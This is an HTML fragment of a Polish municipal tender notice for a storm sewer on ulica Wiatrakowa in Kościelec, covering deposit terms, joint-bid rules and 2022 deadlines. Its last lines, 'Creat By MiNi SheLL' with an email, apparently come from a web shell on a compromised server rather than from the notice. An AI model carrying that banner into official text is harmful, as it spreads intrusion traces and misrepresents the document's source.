Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający wymaga złożenia wadium w wysokości : 5.000,00 zł <br/> (słownie: pięć tysięcy złotych 00/100).<br/>2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/> 1) pieniądzu;<br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 <br/> listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz.U.z 2020 r. poz.299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Zamawiającego- <br/> Gminy Rędziny w Banku PKO BP SA II/O Częstochowa<br/> Nr rachunku: 95 1020 1664 0000 3202 0028 4604<br/> z tytułem : Wadium – „Budowa kanalizacji deszczowej wraz z odtworzeniem nawierzchni ulicy Wiatrakowej w miejscowości Kościelec”<br/>4. Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne <br/> wpłyną na konto zamawiającego przed upływem terminu składnia ofert.<br/>5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2–4, <br/> wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy <br/> stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/> 2. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu <br/> o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie <br/> zamówienia publicznego. <br/> 3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym <br/> mowa w pkt 15.1., składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają <br/> brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim <br/> każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/> 4. W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do występowania w <br/> obrocie gospodarczym lub zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający <br/> się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty <br/> budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/> Formularz oświadczenia stanowi załącznik do swz. <br/>5. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/> Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii <br/> umowy regulującej współpracę tych wykonawców. <br/> 6. W zakresie rodzajów, okresu ważności i formy, w jakiej mogą być składane oświadczenia lub <br/> dokumenty, o których mowa w SWZ obowiązują przepisy Rozporządzenia Ministra Rozwoju, <br/> Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz <br/> innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U z 2020 r. <br/> poz. 2415). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami w zał. nr 4 do swz - projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://epuap.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-23 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ze względu na istniejącą i użytkowaną aktualnie kanalizację sanitarną w ulicy Wolności w Kościelcu oraz brak technicznych możliwości całkowitego zamknięcia drogi powiatowej, Wykonawca zobowiązany jest do wykonania włączenia do istniejącej studni (wraz z kinetą) nowego odcinka poprzez wykonanie przewiertu z rurą ochronną - zgodnie z dokumentacją projektową i opracowanym przez siebie projektem czasowej organizacji ruchu.

Creat By MiNi SheLL
Email: jattceo@gmail.com